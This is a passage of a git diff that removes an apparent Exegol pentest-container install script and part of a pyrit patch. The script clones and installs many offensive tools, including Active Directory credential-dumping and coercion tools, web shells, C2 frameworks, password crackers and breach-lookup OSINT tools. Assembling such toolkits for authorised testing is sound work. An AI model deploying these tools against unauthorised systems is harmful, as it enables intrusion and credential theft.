install_ldapsearch-ad() { - colorecho "Installing ldapsearch-ad" - python3 -m pip install -r requirements.txt - git -C /opt/tools/ clone https://github.com/yaap7/ldapsearch-ad -} - -function install_ntlm-scanner() { - colorecho "Installing ntlm-scanner" - git -C /opt/tools/ clone https://github.com/preempt/ntlm-scanner -} - -function install_rustscan() { - colorecho "Installing RustScan" - mkdir /opt/tools/rustscan/ - wget -qO- https://api.github.com/repos/RustScan/RustScan/releases/latest | grep "browser_download_url.*amd64.deb" | cut -d: -f2,3 | tr -d \" | wget -qO /opt/tools/rustscan/rustscan.deb -i- - dpkg -i /opt/tools/rustscan/rustscan.deb - wget https://gist.github.com/snovvcrash/c7f8223cc27154555496a9cbb4650681/raw/a76a2c658370d8b823a8a38a860e4d88051b417e/rustscan-ports-top1000.toml -O /root/.rustscan.toml -} - -function install_divideandscan() { - colorecho "Installing DivideAndScan" - git -C /opt/tools/ clone https://github.com/snovvcrash/DivideAndScan - cd /opt/tools/DivideAndScan - python3 -m pip install . -} - -function install_trid() { - colorecho "Installing trid" - mkdir /opt/tools/trid/ - cd /opt/tools/trid - wget https://mark0.net/download/tridupdate.zip - wget https://mark0.net/download/triddefs.zip - wget https://mark0.net/download/trid_linux_64.zip - unzip trid_linux_64.zip - unzip triddefs.zip - unzip tridupdate.zip - rm tridupdate.zip triddefs.zip trid_linux_64.zip - chmod +x trid - python3 tridupdate.py -} - -function install_pcredz() { - colorecho "Installing PCredz" - fapt python3-pip libpcap-dev - python3 -m pip install Cython python-libpcap - git -C /opt/tools/ clone https://github.com/lgandx/PCredz -} - -function install_smartbrute() { - colorecho "Installing smartbrute" - git -C /opt/tools/ clone https://github.com/ShutdownRepo/smartbrute - cd /opt/tools/smartbrute - python3 -m pipx install . 
-} - -function install_frida() { - colorecho "Installing frida" - python3 -m pip install frida-tools -} - -function install_androguard() { - colorecho "Installing androguard" - python3 -m pip install androguard -} - -function install_petitpotam() { - colorecho "Installing PetitPotam" - git -C /opt/tools/ clone https://github.com/ly4k/PetitPotam - mv /opt/tools/PetitPotam /opt/tools/PetitPotam_alt - git -C /opt/tools/ clone https://github.com/topotam/PetitPotam -} - -function install_PKINITtools() { - colorecho "Installing PKINITtools" - git -C /opt/tools/ clone https://github.com/dirkjanm/PKINITtools -} - -function install_pywhisker() { - colorecho "Installing pyWhisker" - git -C /opt/tools/ clone https://github.com/ShutdownRepo/pywhisker - cd /opt/tools/pywhisker - python3 -m pip install -r requirements.txt -} - -function install_targetedKerberoast() { - colorecho "Installing targetedKerberoast" - git -C /opt/tools/ clone https://github.com/ShutdownRepo/targetedKerberoast - cd /opt/tools/targetedKerberoast - python3 -m pip install -r requirements.txt -} - -function install_manspider() { - colorecho "Installing MANSPIDER" - git -C /opt/tools/ clone https://github.com/blacklanternsecurity/MANSPIDER - fapt antiword - fapt tesseract-ocr - python3 -m pip install man-spider -} - -function install_pywsus() { - colorecho "Installing pywsus" - git -C /opt/tools/ clone https://github.com/GoSecure/pywsus - cd /opt/tools/pywsus - python3 -m pip install -r requirements.txt -} - -function install_ignorant() { - colorecho "Installing ignorant" - git -C /opt/tools/ clone https://github.com/megadose/ignorant - cd /opt/tools/ignorant - python3 -m pipx install . 
-} - -function install_donpapi() { - colorecho "Installing DonPAPI" - git -C /opt/tools/ clone https://github.com/login-securite/DonPAPI.git - python3 -m pip install -r requirements.txt -} - -function install_gau() { - colorecho "Installing gau" - GO111MODULE=on go install -v github.com/lc/gau@latest -} - -function install_webclientservicescanner() { - colorecho "Installing webclientservicescanner" - git -C /opt/tools/ clone https://github.com/Hackndo/WebclientServiceScanner - cd /opt/tools/WebclientServiceScanner - python3 -m pipx install . -} - -function install_certipy() { - colorecho "Installing Certipy" - git -C /opt/tools/ clone https://github.com/ly4k/Certipy - cd /opt/tools/Certipy - python3 -m pipx install . -} - -function install_eaphammer() { - colorecho "Installing EPA hammer" - git -C /opt/tools/ clone https://github.com/s0lst1c3/eaphammer - cd /opt/tools/eaphammer - echo y | ./kali-setup -} - -function download_hashcat_rules() { - colorecho "Download hashcat rules" - mkdir -p /opt/resources/cracking/hashcat_rules/ - git -C /opt/resources/cracking/hashcat_rules/ clone https://github.com/NSAKEY/nsa-rules - wget -O /opt/resources/cracking/hashcat_rules/hob064.rule https://raw.githubusercontent.com/praetorian-inc/Hob0Rules/master/hob064.rule - wget -O /opt/resources/cracking/hashcat_rules/d3adhob0.rule https://raw.githubusercontent.com/praetorian-inc/Hob0Rules/master/d3adhob0.rule - wget -O /opt/resources/cracking/hashcat_rules/OneRuleToRuleThemAll.rule https://raw.githubusercontent.com/NotSoSecure/password_cracking_rules/master/OneRuleToRuleThemAll.rule -} - -function install_vulny_code_static_analysis() { - colorecho "Installing Vulny Code Static Analysis" - git -C /opt/tools/ clone https://github.com/swisskyrepo/Vulny-Code-Static-Analysis -} - -function install_GPOwned() { - colorecho "Installing GPOwned" - git -C /opt/tools/ clone https://github.com/X-C3LL/GPOwned -} - -function install_nuclei() { - # Vulnerability scanner - colorecho "Installing 
Nuclei" - go install github.com/projectdiscovery/nuclei/v2/cmd/nuclei@latest - nuclei -update-templates -} - -function install_prips() { - # Print the IP addresses in a given range - colorecho "Installing Prips" - fapt prips -} - -function install_hakrevdns() { - # Reverse DNS lookups - colorecho "Installing Hakrevdns" - go install github.com/hakluke/hakrevdns@latest -} - -function install_httprobe() { - colorecho "Installing httprobe" - go install -v github.com/tomnomnom/httprobe@latest -} - -function install_httpx() { - colorecho "Installing httpx" - python3 -m pipx install 'httpx[cli]' -} - -function install_tor() { - colorecho "Installing tor" - mkdir /opt/tools/tor - cd /opt/tools/tor - wget https://dist.torproject.org/tor-0.4.3.7.tar.gz - tar xf tor-0.4.3.7.tar.gz - cd tor-0.4.3.7 - apt install libevent-dev - ./configure - make install -} - -function install_pwndb() { - colorecho "Installing pwndb" - git -C /opt/tools/ clone https://github.com/davidtavarez/pwndb.git - cd /opt/tools/pwndb - chmod +x pwndb.py -} - -function install_robotstester() { - # This Python script can enumerate all URLs present in robots.txt files, and test whether they can be accessed or not. 
- # https://github.com/p0dalirius/robotstester - colorecho "Installing Robotstester" - git -C /opt/tools/ clone https://github.com/p0dalirius/robotstester.git - cd /opt/tools/robotstester - python3 setup.py install -} - -function install_finduncommonshares() { - colorecho "Installing FindUncommonShares" - git -C /opt/tools/ clone https://github.com/p0dalirius/FindUncommonShares - cd /opt/tools/FindUncommonShares/ - python3 -m pip install -r requirements.txt -} - -function install_shadowcoerce() { - colorecho "Installing ShadowCoerce PoC" - git -C /opt/tools/ clone https://github.com/ShutdownRepo/ShadowCoerce -} - -function install_pwncat() { - colorecho "Installing pwncat" - python3 -m pipx install pwncat-cs -} - -function the_hacker_recipes() { - colorecho "Adding The Hacker Recipes to the resources" - git -C /opt/resources/ clone https://github.com/ShutdownRepo/The-Hacker-Recipes -} - -function install_dcsync() { - colorecho "Installing DCSync.py" - git -C /opt/tools/ clone https://github.com/n00py/DCSync -} - -function install_gMSADumper() { - colorecho "Installing gMSADumper" - git -C /opt/tools/ clone https://github.com/micahvandeusen/gMSADumper -} - -function install_modifyCertTemplate() { - colorecho "Installing modifyCertTemplate" - git -C /opt/tools/ clone https://github.com/fortalice/modifyCertTemplate -} - -function install_pylaps() { - colorecho "Installing pyLAPS" - git -C /opt/tools/ clone https://github.com/p0dalirius/pyLAPS -} - -function install_ldaprelayscan() { - colorecho "Installing LdapRelayScan" - git -C /opt/tools/ clone https://github.com/zyn3rgy/LdapRelayScan - cd /opt/tools/LdapRelayScan - python3 -m pip install -r requirements.txt -} - -function install_goldencopy() { - colorecho "Installing GoldenCopy" - git -C /opt/tools/ clone https://github.com/Dramelac/GoldenCopy - cd /opt/tools/GoldenCopy - python3 -m pip install -r requirements.txt -} - -function install_base() { - update || exit - echo $VERSION > /opt/.exegol_version - echo '# 
Debian sources' | tee -a /etc/apt/sources.list - echo 'deb http://deb.debian.org/debian/ bullseye main' | tee -a /etc/apt/sources.list - echo 'deb-src http://deb.debian.org/debian/ bullseye main' | tee -a /etc/apt/sources.list - echo 'deb http://security.debian.org/debian-security bullseye-security main contrib' | tee -a /etc/apt/sources.list - echo 'deb-src http://security.debian.org/debian-security bullseye-security main contrib' | tee -a /etc/apt/sources.list - echo 'deb http://deb.debian.org/debian/ bullseye-updates main contrib' | tee -a /etc/apt/sources.list - echo 'deb-src http://deb.debian.org/debian/ bullseye-updates main contrib' | tee -a /etc/apt/sources.list - apt-get update - fapt man # Most important - fapt git # Git client - fapt lsb-release - fapt pciutils - fapt zip - fapt unzip - fapt kmod -# fapt gifsicle - fapt sudo # Sudo - fapt curl # HTTP handler - fapt wget # Wget - fapt python3-pyftpdlib # FTP server python library - fapt php # Php language - fapt python2 # Python 2 language - fapt python3 # Python 3 language - fapt python2-dev # Python 2 language (dev version) - fapt python3-dev # Python 3 language (dev version) - fapt python3.9-venv - ln -s /usr/bin/python2.7 /usr/bin/python # fix shit - python-pip # Pip - fapt python3-pip # Pip - filesystem - locales - tmux # Tmux - fapt zsh # Awesome shell - install_ohmyzsh # Awesome shell - fapt python-setuptools - fapt python3-setuptools - python3 -m pip install wheel - python -m pip install wheel - install_fzf # File fuzzer - install_grc - fapt npm # Node Package Manager - install_nvm - fapt golang # Golang language - fapt gem # Install ruby packages - fapt automake # Automake - fapt autoconf # Autoconf - fapt make - fapt gcc - fapt g++ - fapt file # Detect type of file with magic number - fapt lsof # Linux utility - fapt less # Linux utility - fapt x11-apps # Linux utility - fapt net-tools # Linux utility - fapt vim # Text editor - install_ultimate_vimrc # Make vim usable OOFB - fapt nano # Text 
editor (not the best) - fapt emacs-nox - fapt jq # jq is a lightweight and flexible command-line JSON processor - fapt iputils-ping # Ping binary - fapt iproute2 # Firewall rules - fapt openvpn - install_mdcat # cat markdown files - install_bat # Beautiful cat - fapt tidy # TODO: comment this - fapt amap # TODO: comment this - fapt mlocate # TODO: comment this - fapt xsel # TODO: comment this - fapt libtool # TODO: comment this - fapt dnsutils # DNS utilities like dig and nslookup - fapt dos2unix # Convert encoded dos script - DEBIAN_FRONTEND=noninteractive fapt macchanger # Macchanger - fapt samba # Samba - fapt ftp # FTP client - fapt ssh # SSH client - fapt sshpass # SSHpass (wrapper for using SSH with password on the CLI) - fapt telnet # Telnet client - fapt nfs-common # NFS client - fapt snmp # TODO: comment this - fapt ncat # Socket manager - fapt netcat-traditional # Socket manager - fapt socat # Socket manager - #gf_install # wrapper around grep - fapt rdate # tool for querying the current time from a network server - fapt putty # GUI-based SSH, Telnet and Rlogin client - fapt screen # CLI-based PuTT-like - fapt p7zip-full # 7zip - fapt p7zip-rar # 7zip rar module - fapt rar # rar - fapt unrar # unrar - fapt xz-utils # xz (de)compression - fapt xsltproc # apply XSLT stylesheets to XML documents (Nmap reports) - install_pipx - fapt parallel - fapt tree - fapt faketime -} - -# Package dedicated to most used offensive tools -function install_most_used_tools() { - fapt exploitdb # Exploitdb downloaded locally - fapt metasploit-framework # Offensive framework - fapt nmap # Port scanner - fapt seclists # Awesome wordlists - install_subfinder # Subdomain bruteforcer - install_autorecon # External recon tool - install_waybackurls # Website history - install_theHarvester # Gather emails, subdomains, hosts, employee names, open ports and banners - install_simplyemail # Gather emails - install_gobuster # Web fuzzer (pretty good for several extensions) - install_ffuf # 
Web fuzzer (little favorites) - fapt wfuzz # Web fuzzer (second favorites) - fapt nikto # Web scanner - fapt sqlmap # SQL injection scanner - fapt hydra # Login scanner - fapt joomscan # Joomla scanner - fapt wpscan # Wordpress scanner - install_droopescan # Drupal scanner - install_drupwn # Drupal scanner - install_testssl # SSL/TLS scanner - fapt sslscan # SSL/TLS scanner - fapt weevely # Awesome secure and light PHP webshell - install_CloudFail # Cloudflare misconfiguration detector - install_EyeWitness # Website screenshoter - install_wafw00f # Waf detector - install_jwt_tool # Toolkit for validating, forging, scanning and tampering JWTs - install_gittools # Dump a git repository from a website - install_ysoserial # Deserialization payloads - install_responder # LLMNR, NBT-NS and MDNS poisoner - install_crackmapexec # Network scanner - install_impacket # Network protocols scripts - fapt enum4linux # Hosts enumeration - fapt mimikatz # AD vulnerability exploiter - fapt smbclient # Small dynamic library that allows iOS apps to access SMB/CIFS file servers - fapt smbmap # Allows users to enumerate samba share drives across an entire domain - install_nuclei # Vulnerability scanner - evilwinrm # WinRM shell - install_john # Password cracker - fapt hashcat # Password cracker - download_hashcat_rules - fapt fcrackzip # Zip cracker -} - -# Package dedicated to offensive miscellaneous tools -function install_misc_tools() { - fapt exploitdb # Exploitdb downloaded locally - fapt rlwrap # Reverse shell utility - install_shellerator # Reverse shell generator - install_uberfile # file uploader/downloader commands generator - arsenal # Cheatsheets tool - install_trilium # notes taking tool - fapt exiftool # Meta information reader/writer - fapt imagemagick # Copy, modify, and distribute image - install_ngrok # expose a local development server to the Internet - install_whatportis # Search default port number - fapt ascii # The ascii table in the shell -} - -# Package 
dedicated to the installation of wordlists and tools like wl generators -function install_wordlists_tools() { - fapt crunch # Wordlist generator - fapt seclists # Awesome wordlists - fapt wordlists # Others wordlists (not the best) - fapt cewl # Wordlist generator - fapt cupp # User password profiler - install_pass_station # Default credentials database -} - -# Package dedicated to offline cracking/bruteforcing tools -function install_cracking_tools() { - fapt hashcat # Password cracker - download_hashcat_rules - install_john # Password cracker - fapt fcrackzip # Zip cracker - fapt pdfcrack # PDF cracker - fapt bruteforce-luks # Find the password of a LUKS encrypted volume - install_nth # Name-That-Hash, the hash identifier tool -} - -# Package dedicated to osint, recon and passive tools -function install_osint_tools() { - #Picture And Videos - youtubedl # Command-line program to download videos from YouTube.com and other video sites - apt-get update - fapt exiftool # For read exif information - fapt exifprobe # Probe and report structure and metadata content of camera image files - #Subdomain - Sublist3r # Fast subdomains enumeration tool - assetfinder # Find domains and subdomains potentially related to a given domain - install_subfinder # Subfinder is a subdomain discovery tool that discovers valid subdomains for websites - fapt amass # OWASP Amass tool suite is used to build a network map of the target - findomain # Findomain Monitoring Service use OWASP Amass, Sublist3r, Assetfinder and Subfinder - #DNS - fapt dnsenum # DNSEnum is a command-line tool that automatically identifies basic DNS records - fapt dnsrecon # DNS Enumeration Script - #Email - holehe # Check if the mail is used on different sites - install_simplyemail # Gather emails - install_theHarvester # Gather emails, subdomains, hosts, employee names, open ports and banners - h8mail # Email OSINT & Password breach hunting tool - infoga # Gathering email accounts informations - buster # An advanced 
tool for email reconnaissance - pwnedornot # OSINT Tool for Finding Passwords of Compromised Email Addresses - ghunt # Investigate Google Accounts with emails - #Phone - phoneinfoga # Advanced information gathering & OSINT framework for phone numbers - #Social Network - maigret_pip # Search pseudos and information about users on many platforms - linkedin2username # Generate username lists for companies on LinkedIn - toutatis # Toutatis is a tool that allows you to extract information from instagrams accounts - tiktokscraper # TikTok Scraper. Download video posts, collect user/trend/hashtag/music feed metadata, sign URL and etc - #Website - install_waybackurls # Website history - carbon14 # OSINT tool for estimating when a web page was written - WikiLeaker # A WikiLeaks scraper - photon # Incredibly fast crawler designed for OSINT. - install_CloudFail # Utilize misconfigured DNS and old database records to find hidden IP's behind the CloudFlare network - #Ip - ipinfo # Get information about an IP address using command line with ipinfo.io - #Data visualization - constellation # A graph-focused data visualisation and interactive analysis application. - #Framework - apt-get update - fapt maltego # Maltego is a software used for open-source intelligence and forensics - fapt spiderfoot # SpiderFoot automates OSINT collection - fapt finalrecon # A fast and simple python script for web reconnaissance - fapt recon-ng # External recon tool - # TODO : http://apt.vulns.sexy make apt update print a warning, and the repo has a weird name, we need to fix this in order to not alarm users - # sn0int # Semi-automatic OSINT framework and package manager - OSRFramework # OSRFramework, the Open Sources Research Framework - #Dark - apt-get update - install_tor # Tor proxy - fapt torbrowser-launcher # Tor browser - onionsearch # OnionSearch is a script that scrapes urls on different .onion search engines. - install_pwndb # No need to say more, no ? Be responsible with this tool please ! 
- #Github - githubemail # Retrieve a GitHub user's email even if it's not public - #Other - apt-get update - fapt whois # See information about a specific domain name or IP address - ReconDog # Informations gathering tool - JSParser # Parse JS files - gron # JSON parser - #install_ignorant # holehe but for phone numbers -} - -# Package dedicated to applicative and active web pentest tools -function install_web_tools() { - install_gobuster # Web fuzzer (pretty good for several extensions) - install_kiterunner # Web fuzzer (fast and pretty good for api bruteforce) - amass # Web fuzzer - install_ffuf # Web fuzzer (little favorites) - fapt dirb # Web fuzzer - fapt dirbuster # Web fuzzer - fapt wfuzz # Web fuzzer (second favorites) - install_dirsearch # Web fuzzer - fapt nikto # Web scanner - fapt sqlmap # SQL injection scanner - SSRFmap # SSRF scanner - gopherus # SSRF helper - NoSQLMap # NoSQL scanner - XSStrike # XSS scanner - install_XSpear # XSS scanner - fapt xsser # XSS scanner - xsrfprobe # CSRF scanner - Bolt # CSRF scanner - fapt dotdotpwn # LFI scanner - kadimus # LFI scanner - fuxploider # File upload scanner - Blazy # Login scanner - fapt patator # Login scanner - fapt joomscan # Joomla scanner - fapt wpscan # Wordpress scanner - install_droopescan # Drupal scanner - install_drupwn # Drupal scanner - install_cmsmap # CMS scanner (Joomla, Wordpress, Drupal) - install_moodlescan # Moodle scanner - install_testssl # SSL/TLS scanner - fapt sslscan # SSL/TLS scanner - fapt weevely # Awesome secure and light PHP webshell - install_CloudFail # Cloudflare misconfiguration detector - install_EyeWitness # Website screenshoter - OneForAll # TODO: comment this - install_wafw00f # Waf detector - CORScanner # CORS misconfiguration detector - hakrawler # Web endpoint discovery - LinkFinder # Discovers endpoint JS files - timing_attack # Cryptocraphic timing attack - updog # New HTTPServer - install_jwt_tool # Toolkit for validating, forging, scanning and tampering JWTs - 
jwt_cracker # JWT cracker and bruteforcer - wuzz # Burp cli - install_git-dumper # Dump a git repository from a website - install_gittools # Dump a git repository from a website - fapt padbuster - install_ysoserial # Deserialization payloads - fapt whatweb # Recognises web technologies including content management - phpggc # php deserialization payloads - symfony_exploits #  symfony secret fragments exploit - jdwp_shellifier # exploit java debug - install_httpmethods # Tool for HTTP methods enum & verb tampering - install_h2csmuggler # Tool for HTTP2 smuggling - install_byp4xx # Tool to automate 40x errors bypass attempts - install_feroxbuster # ffuf but with multithreaded recursion - install_tomcatwardeployer # Apache Tomcat auto WAR deployment & pwning tool - install_clusterd # Axis2/JBoss/ColdFusion/Glassfish/Weblogic/Railo scanner - install_arjun # HTTP Parameter Discovery - install_gau - install_nuclei # Vulnerability scanner - install_prips # Print the IP addresses in a given range - install_hakrevdns # Reverse DNS lookups - install_httprobe - install_httpx - install_robotstester # Robots.txt scanner -# install_gitrob # Senstive files reconnaissance in github -} - -# Package dedicated to command & control frameworks -function install_c2_tools() { - Empire # Exploit framework - fapt metasploit-framework # Offensive framework - install_routersploit # Exploitation Framework for Embedded Devices - install_pwncat # netcat and rlwrap on steroids to handle revshells, automates a few things too - # TODO: add Silentrinity - # TODO: add starkiller - # TODO: add beef-xss -} - -# Package dedicated to specific services tools apart from HTTP/HTTPS (e.g. 
SSH, and so on) -install_services_tools() { - fapt ssh-audit # SSH server audit - fapt hydra # Login scanner - memcached-cli # TODO: comment this - fapt mariadb-client # Mariadb client - fapt redis-tools # Redis protocol - install_odat # Oracle Database Attacking Tool -} - -# Package dedicated to internal Active Directory tools -function install_ad_tools() { - install_responder # LLMNR, NBT-NS and MDNS poisoner - install_crackmapexec # Network scanner - sprayhound # Password spraying tool - install_smartbrute # Password spraying tool - install_bloodhound.py # AD cartographer - neo4j_install # Bloodhound dependency - cypheroth # Bloodhound dependency - # mitm6_sources # Install mitm6 from sources - mitm6_pip # DNS server misconfiguration exploiter - aclpwn # ACL exploiter - # IceBreaker # TODO: comment this - dementor # SpoolService exploiter - install_impacket # Network protocols scripts - pykek # AD vulnerability exploiter - install_lsassy # Credentials extracter - privexchange # Exchange exploiter - ruler # Exchange exploiter - darkarmour # Windows AV evasion - amber # AV evasion - powershell # Windows Powershell for Linux - krbrelayx # Kerberos unconstrained delegation abuse toolkit - rbcd-attack # Kerberos Resource-Based Constrained Delegation Attack - rbcd-permissions # Kerberos Resource-Based Constrained Delegation Attack - evilwinrm # WinRM shell - pypykatz # Mimikatz implementation in pure Python - enyx # Hosts discovery - fapt enum4linux # Hosts enumeration - enum4linux-ng # Hosts enumeration - zerologon # Exploit for zerologon cve-2020-1472 - libmspack # Library for some loosely related Microsoft compression format - peas_offensive # Library and command line application for running commands on Microsoft Exchange - windapsearch-go # Active Directory Domain enumeration through LDAP queries - oaburl_py # Send request to the MS Exchange Autodiscover service - LNKUp - fapt mimikatz # AD vulnerability exploiter - fapt samdump2 # Dumps Windows 2k/NT/XP/Vista 
password hashes - fapt smbclient # Small dynamic library that allows iOS apps to access SMB/CIFS file servers - fapt smbmap # Allows users to enumerate samba share drives across an entire domain - fapt passing-the-hash # Pass the hash attack - fapt smtp-user-enum # SMTP user enumeration via VRFY, EXPN and RCPT - fapt onesixtyone # SNMP scanning - fapt nbtscan # NetBIOS scanning tool - fapt rpcbind # RPC scanning - fapt gpp-decrypt # Decrypt a given GPP encrypted string - ntlmv1-multi # NTLMv1 multi tools: modifies NTLMv1/NTLMv1-ESS/MSCHAPv2 - hashonymize # Anonymize NTDS, ASREProast, Kerberoast hashes for remote cracking - install_gosecretsdump # secretsdump in Go for heavy files - install_adidnsdump # enumerate DNS records in Domain or Forest DNS zones - install_powermad # MachineAccountQuota and DNS exploit tools - install_snaffler # Shares enumeration and looting - install_pygpoabuse # TODO : comment this - install_bloodhound-import # Python script to import BH data to a neo4j db - install_bloodhound-quickwin # Python script to find quickwins from BH data in a neo4j db - install_ldapsearch-ad # Python script to find quickwins from basic ldap enum - install_ntlm-scanner # Python script to check public vulns on DCs - install_petitpotam # Python script to coerce auth through MS-EFSR abuse - install_PKINITtools # Python scripts to use kerberos PKINIT to obtain TGT - install_pywhisker # Python script to manipulate msDS-KeyCredentialLink - install_manspider # Snaffler-like in Python - install_targetedKerberoast - install_pcredz - install_pywsus - install_donpapi - install_webclientservicescanner - install_certipy - npm install ntpsync # sync local time with remote server - install_shadowcoerce - install_dcsync - install_gMSADumper - install_modifyCertTemplate - install_pylaps - install_finduncommonshares - install_ldaprelayscan - install_goldencopy -} - -# Package dedicated to mobile apps pentest tools -function install_mobile_tools() { - fapt android-tools-adb - fapt 
smali - fapt dex2jar - fapt zipalign - fapt apksigner - fapt apktool - install_frida - install_androguard # Reverse engineering and analysis of Android applications -} - -# Package dedicated to VOIP/SIP pentest tools -function install_voip_tools() { - install_sipvicious # Set of tools for auditing SIP based VOIP systems - #TODO: SIPp? -} - -# Package dedicated to RFID/NCF pentest tools -function install_rfid_tools() { - fapt git - fapt libusb-dev - fapt autoconf - fapt nfct - install_pcsc - install_libnfc # NFC library - install_mfoc # Tool for nested attack on Mifare Classic - install_mfcuk # Tool for Darkside attack on Mifare Classic - install_libnfc-crypto1-crack # tool for hardnested attack on Mifare Classic - install_mfdread # Tool to pretty print Mifare 1k/4k dumps - install_proxmark3 # Proxmark3 scripts -} - -# Package dedicated to IoT tools -function install_iot_tools() { - fapt avrdude - fapt minicom -} - -# Package dedicated to SDR -function install_sdr_tools() { - install_mousejack # tools for mousejacking - install_jackit # tools for mousejacking - install_hackrf # tools for hackrf - install_gqrx # spectrum analyzer for SDR - fapt rtl-433 # decode radio transmissions from devices on the ISM bands - # TODO : ubertooth, ... 
-} - -# Package dedicated to network pentest tools -function install_network_tools() { - install_proxychains # Network tool - DEBIAN_FRONTEND=noninteractive fapt wireshark # Wireshark packet sniffer - DEBIAN_FRONTEND=noninteractive fapt tshark # Tshark packet sniffer - # wireshark_sources # Install Wireshark from sources - fapt hping3 # Discovery tool - fapt masscan # Port scanner - fapt nmap # Port scanner - install_autorecon # External recon tool - # Sn1per # Vulnerability scanner - fapt tcpdump # Capture TCP traffic - install_dnschef # Python DNS server - install_rustscan # Fast port scanner - install_divideandscan # Python project to automate port scanning routine - fapt iptables # iptables for the win - fapt traceroute # ping ping - install_chisel # Fast TCP/UDP tunnel over HTTP - install_sshuttle # Transparent proxy over SSH - fapt dns2tcp # TCP tunnel over DNS - install_eaphammer -} - -# Package dedicated to wifi pentest tools -function install_wifi_tools() { - pyrit # Databases of pre-computed WPA/WPA2-PSK authentication phase - wifite2 # Retrieving password of a wireless access point (router) - fapt aircrack-ng # WiFi security auditing tools suite - fapt hostapd-wpe # Modified hostapd to facilitate AP impersonation attacks - fapt reaver # Brute force attack against Wifi Protected Setup - fapt bully # WPS brute force attack - fapt cowpatty # WPA2-PSK Cracking - bettercap_install # MiTM tool - hcxtools # Tools for PMKID and other wifi attacks - hcxdumptool # Small tool to capture packets from wlan devices -} - -# Package dedicated to forensic tools -function install_forensic_tools() { - fapt pst-utils # Reads a PST and prints the tree structure to the console - fapt binwalk # Tool to find embedded files - fapt foremost # Alternative to binwalk - install_volatility # Memory analysis tool - install_trid # filetype detection tool - install_peepdf # PDF analysis -} - -# Package dedicated to steganography tools -function install_steganography_tools() { - 
install_zsteg # Detect stegano-hidden data in PNG & BMP - fapt stegosuite - fapt steghide - install_stegolsb # (including wavsteg) -} - -# Package dedicated to cloud tools -function install_cloud_tools() { - kubectl - awscli - install_scout # Multi-Cloud Security Auditing Tool -} - -# Package dedicated to reverse engineering tools -function install_reverse_tools() { - pwntools # CTF framework and exploit development library - pwndbg # Advanced Gnu Debugger - angr # Binary analysis - checksec_py # Check security on binaries - fapt nasm # Netwide Assembler - fapt radare2 # Awesome debugger - fapt wabt # The WebAssembly Binary Toolkit - fapt ltrace - fapt strace -} - -# Package dedicated to attack crypto -function install_crypto_tools() { -# install_rsactftool # attack rsa -# todo : this function fails and make the whole build stop, temporarily removing - echo "nothing to install" -} - -# Package dedicated to GUI-based apps -function install_GUI_tools() { - bloodhound - bloodhound_old_v3 - bloodhound_old_v2 - fapt freerdp2-x11 - fapt rdesktop - ghidra - fapt xtightvncviewer - fapt jd-gui # Java decompiler - burp -} - -# Package dedicated to SAST and DAST tools -function install_code_analysis_tools() { - install_vulny_code_static_analysis -} - -# Package dedicated to the download of resources -function install_resources() { - sysinternals - winenum - pspy - peass - linux_smart_enumeration - linenum - linux_exploit_suggester - mimikatz - nishang - powersploit - privesccheck - rubeus - inveigh - sharphound - juicypotato - impacket_windows - nc - spoolsample - diaghub - lazagne - sublinacl - mimipenguin - mimipy - plink - deepce - rockyou - webshells - mailsniper - ysoserial_net - bitleaker - napper - http-put-server - azurehound - icmpdoor - sharpcollection - the_hacker_recipes -} - -# Function used to clean up post-install files -function install_clean() { - colorecho "Cleaning..." 
- rm -rfv /tmp/* -} - -# Entry point for the installation -if [[ $EUID -ne 0 ]]; then - echo -e "${RED}" - echo "You must be a root user" 2>&1 - echo -e "${NOCOLOR}" - exit 1 -else - if declare -f "$1" > /dev/null - then - if [[ -f '/.dockerenv' ]]; then - echo -e "${GREEN}" - echo "This script is running in docker, as it should :)" - echo "If you see things in red, don't panic, it's usually not errors, just badly handled colors" - echo -e "${NOCOLOR}${BLUE}" - echo "A successful build will output the following last line:" - echo " Successfully tagged nwodtuhs/exegol:latest" - echo -e "${NOCOLOR}" - sleep 2 - "$@" - else - echo -e "${RED}" - echo "[!] Careful : this script is supposed to be run inside a docker/VM, do not run this on your host unless you know what you are doing and have done backups. You are warned :)" - echo "[*] Sleeping 30 seconds, just in case... You can still stop this" - echo -e "${NOCOLOR}" - sleep 30 - "$@" - fi - else - echo "'$1' is not a known function name" >&2 - exit 1 - fi -fi diff --git a/sources/patches/undefined-symbol-aesni-key.patch b/sources/patches/undefined-symbol-aesni-key.patch deleted file mode 100644 index 1b87eb43..00000000 --- a/sources/patches/undefined-symbol-aesni-key.patch +++ /dev/null @@ -1,155 +0,0 @@ -diff --git a/cpyrit/_cpyrit_cpu.c b/cpyrit/_cpyrit_cpu.c -index 137d87d..f4f8e67 100644 ---- a/cpyrit/_cpyrit_cpu.c -+++ b/cpyrit/_cpyrit_cpu.c -@@ -1077,70 +1077,70 @@ ccmp_encrypt_openssl(const unsigned char *A0, const unsigned char *S0, const uns - return -1; - } - --#ifdef COMPILE_AESNI -- inline __m128i -- aesni_key(__m128i a, __m128i b) -- { -- __m128i t; -- -- b = _mm_shuffle_epi32(b, 255); -- t = _mm_slli_si128(a, 4); -- a = _mm_xor_si128(a, t); -- t = _mm_slli_si128(t, 4); -- a = _mm_xor_si128(a, t); -- t = _mm_slli_si128(t, 4); -- a = _mm_xor_si128(a, t); -- a = _mm_xor_si128(a, b); -- -- return a; -- } -- -- static Py_ssize_t -- ccmp_encrypt_aesni(const unsigned char *A0, const unsigned char *S0, const 
unsigned char *tkbuffer, Py_ssize_t keycount) -- { -- __m128i roundkey, state; -- Py_ssize_t i; -- unsigned char crib[16]; -- -- for (i = 0; i < keycount; i++) -- { -- /* Setup round key from main key */ -- roundkey = _mm_loadu_si128((__m128i*)&tkbuffer[i * 16]); -- -- /* Get plaintext and XOR it with key to get AES-state */ -- state = _mm_loadu_si128((__m128i*)A0); -- state = _mm_xor_si128(state, roundkey); -- -- /* Perform 10 AES-rounds on the state using the derived round keys */ -- roundkey = aesni_key(roundkey, _mm_aeskeygenassist_si128(roundkey, 1)); -- state = _mm_aesenc_si128(state, roundkey); -- roundkey = aesni_key(roundkey, _mm_aeskeygenassist_si128(roundkey, 2)); -- state = _mm_aesenc_si128(state, roundkey); -- roundkey = aesni_key(roundkey, _mm_aeskeygenassist_si128(roundkey, 4)); -- state = _mm_aesenc_si128(state, roundkey); -- roundkey = aesni_key(roundkey, _mm_aeskeygenassist_si128(roundkey, 8)); -- state = _mm_aesenc_si128(state, roundkey); -- roundkey = aesni_key(roundkey, _mm_aeskeygenassist_si128(roundkey, 16)); -- state = _mm_aesenc_si128(state, roundkey); -- roundkey = aesni_key(roundkey, _mm_aeskeygenassist_si128(roundkey, 32)); -- state = _mm_aesenc_si128(state, roundkey); -- roundkey = aesni_key(roundkey, 